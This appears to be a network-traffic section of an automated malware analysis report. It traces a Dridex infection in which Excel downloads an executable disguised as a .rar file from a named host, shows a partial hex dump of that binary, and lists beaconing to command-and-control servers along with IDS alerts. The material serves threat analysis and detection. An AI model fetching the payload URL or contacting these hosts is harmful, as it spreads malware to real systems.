                                                                                                                                      01/12/21-01:45:46.988915TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936380.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:47.527705TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493645.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:47.527705TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493645.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:48.672018TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936677.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:49.236417TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936780.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:49.820444TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493685.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:49.820444TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493685.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:50.877825TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937077.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:51.402479TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937180.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:51.928769TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493725.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:51.928769TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493725.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:52.970569TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937477.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:53.492621TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937580.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:54.021713TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493765.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:54.021713TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493765.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:55.058488TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937877.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:55.582649TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937980.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:56.123069TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493805.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:56.123069TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493805.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:57.165930TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938277.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:57.705210TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938380.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:58.231600TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493845.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:58.231600TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493845.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:59.286124TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938677.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:59.811323TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938780.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:46:00.328290TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493885.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:46:00.328290TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493885.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:46:01.400849TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939077.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:46:01.917753TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939180.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:46:02.452135TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493925.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:46:02.452135TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493925.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:46:03.514746TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939477.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:46:04.034003TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939580.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:46:04.558184TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493965.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:46:04.558184TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493965.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:46:05.621118TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939877.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:46:06.144329TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939980.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:46:06.657059TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494005.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:46:06.657059TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494005.100.228.233192.168.2.22

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Jan 12, 2021 01:43:52.658485889 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:52.850734949 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:52.850863934 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:52.851536036 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.049026966 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049108028 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049163103 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049215078 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049264908 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049315929 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049338102 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.049355030 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049375057 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.049415112 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.049454927 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.049470901 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049535990 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049562931 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.049597979 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.049602985 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.049674988 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.055134058 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.241739035 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.241807938 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.241875887 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.241934061 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.241949081 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.241978884 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.241993904 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.241996050 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242058039 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242070913 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242119074 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242130041 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242183924 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242217064 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242260933 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242288113 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242311954 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242350101 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242371082 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242412090 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.242417097 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.242481947 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.244703054 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.434740067 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.434797049 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.434875011 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.434937000 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.434998989 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435039043 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435059071 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435071945 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435076952 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435120106 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435126066 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435180902 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435185909 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435244083 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435266972 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435322046 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435339928 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435372114 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435390949 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435421944 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435436964 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435471058 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435486078 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435520887 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435535908 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435570955 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435584068 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435621023 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435636997 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435669899 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435687065 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435719013 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435733080 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435769081 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435781956 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435818911 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435836077 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435869932 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.435884953 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.435936928 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.436577082 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.436649084 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.438278913 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628155947 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628238916 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628303051 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628364086 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628386974 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628424883 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628427982 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628436089 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628487110 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628504992 CET4916580192.168.2.2268.65.122.35
                                                                                                                                      Jan 12, 2021 01:43:53.628546953 CET804916568.65.122.35192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:53.628562927 CET4916580192.168.2.2268.65.122.35

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Jan 12, 2021 01:43:52.593648911 CET5219753192.168.2.228.8.8.8
                                                                                                                                      Jan 12, 2021 01:43:52.649863005 CET53521978.8.8.8192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:59.448873043 CET5309953192.168.2.228.8.8.8
                                                                                                                                      Jan 12, 2021 01:43:59.499317884 CET53530998.8.8.8192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:59.504878998 CET5283853192.168.2.228.8.8.8
                                                                                                                                      Jan 12, 2021 01:43:59.552831888 CET53528388.8.8.8192.168.2.22
                                                                                                                                      Jan 12, 2021 01:43:59.553232908 CET5283853192.168.2.228.8.8.8
                                                                                                                                      Jan 12, 2021 01:43:59.601133108 CET53528388.8.8.8192.168.2.22
                                                                                                                                      Jan 12, 2021 01:44:31.064388037 CET6120053192.168.2.228.8.8.8
                                                                                                                                      Jan 12, 2021 01:44:31.112456083 CET53612008.8.8.8192.168.2.22
                                                                                                                                      Jan 12, 2021 01:44:31.133083105 CET4954853192.168.2.228.8.8.8
                                                                                                                                      Jan 12, 2021 01:44:31.189367056 CET53495488.8.8.8192.168.2.22
                                                                                                                                      Jan 12, 2021 01:44:32.291182995 CET5562753192.168.2.228.8.8.8
                                                                                                                                      Jan 12, 2021 01:44:32.339005947 CET53556278.8.8.8192.168.2.22
                                                                                                                                      Jan 12, 2021 01:44:32.348968983 CET5600953192.168.2.228.8.8.8
                                                                                                                                      Jan 12, 2021 01:44:32.396790028 CET53560098.8.8.8192.168.2.22

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                      Jan 12, 2021 01:43:52.593648911 CET192.168.2.228.8.8.80x1c73Standard query (0)truxiellogroup.comA (IP address)IN (0x0001)

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                      Jan 12, 2021 01:43:52.649863005 CET8.8.8.8192.168.2.220x1c73No error (0)truxiellogroup.com68.65.122.35A (IP address)IN (0x0001)
                                                                                                                                      Jan 12, 2021 01:44:32.339005947 CET8.8.8.8192.168.2.220xf75cNo error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                                      Jan 12, 2021 01:44:32.339005947 CET8.8.8.8192.168.2.220xf75cNo error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                                      Jan 12, 2021 01:44:32.396790028 CET8.8.8.8192.168.2.220x22f3No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                                      Jan 12, 2021 01:44:32.396790028 CET8.8.8.8192.168.2.220x22f3No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • truxiellogroup.com

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.2.224916568.65.122.3580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jan 12, 2021 01:43:52.851536036 CET0OUTGET /d0l359.rar HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      UA-CPU: AMD64
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                      Host: truxiellogroup.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Jan 12, 2021 01:43:53.049026966 CET2INHTTP/1.1 200 OK
                                                                                                                                      date: Tue, 12 Jan 2021 00:43:52 GMT
                                                                                                                                      server: Apache
                                                                                                                                      last-modified: Mon, 11 Jan 2021 16:51:11 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 318976
                                                                                                                                      content-type: application/x-rar-compressed
                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 1c 9a fc 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 7a 04 00 00 60 00 00 00 00 00 00 d0 26 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 82 00 00 8c 00 00 00 00 00 05 00 7c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 86 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 24 00 00 00 10 00 00 00 26 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 40 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 33 00 d8 03 00 00 00 50 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 60 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 46 00 00 00 00 70 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 1b 00 00 00 80 00 00 00 1c 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 cc 52 04 00 00 a0 00 00 00 54 04 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 7c 2e 00 00 00 00 05 00 00 30 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 30 05 00 00 0a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 56 8b 45 0c 89 45 fc 8b 0d 28 9b 00 10 89 4d 08 68 5c 11 00 00 6a 00 ff 15 74 80 00 10 8b 55 fc 8d b4 02 66 a1 06 00 68 5c 11 00 00 6a 00 ff 15 74 80 00 10 03 f0 8b 45 08 03 30 8b 4d 08 89 31 8b 55 08 8b 02 2d 66 a1 06 00 8b 4d 08 89 01 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 51 a1 d8 9a 00 10 89
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_!2z`&@@|.0P.text$& `.rdata@*@@.rdata3P,@@.2`0@@.rdata2Fp2@@.data`4@.text4RTP @.rsrc|.0@@.relocP0@BUQVEE(Mh\jtUfh\jtE0M1U-fM^]UQ


                                                                                                                                      HTTPS Packets

                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                      Jan 12, 2021 01:43:58.265167952 CET77.220.64.37443192.168.2.2249166CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:02.725135088 CET77.220.64.37443192.168.2.2249171CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:04.816543102 CET77.220.64.37443192.168.2.2249175CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:06.899440050 CET77.220.64.37443192.168.2.2249179CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:09.036133051 CET77.220.64.37443192.168.2.2249183CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:11.132100105 CET77.220.64.37443192.168.2.2249187CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:13.200539112 CET77.220.64.37443192.168.2.2249191CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
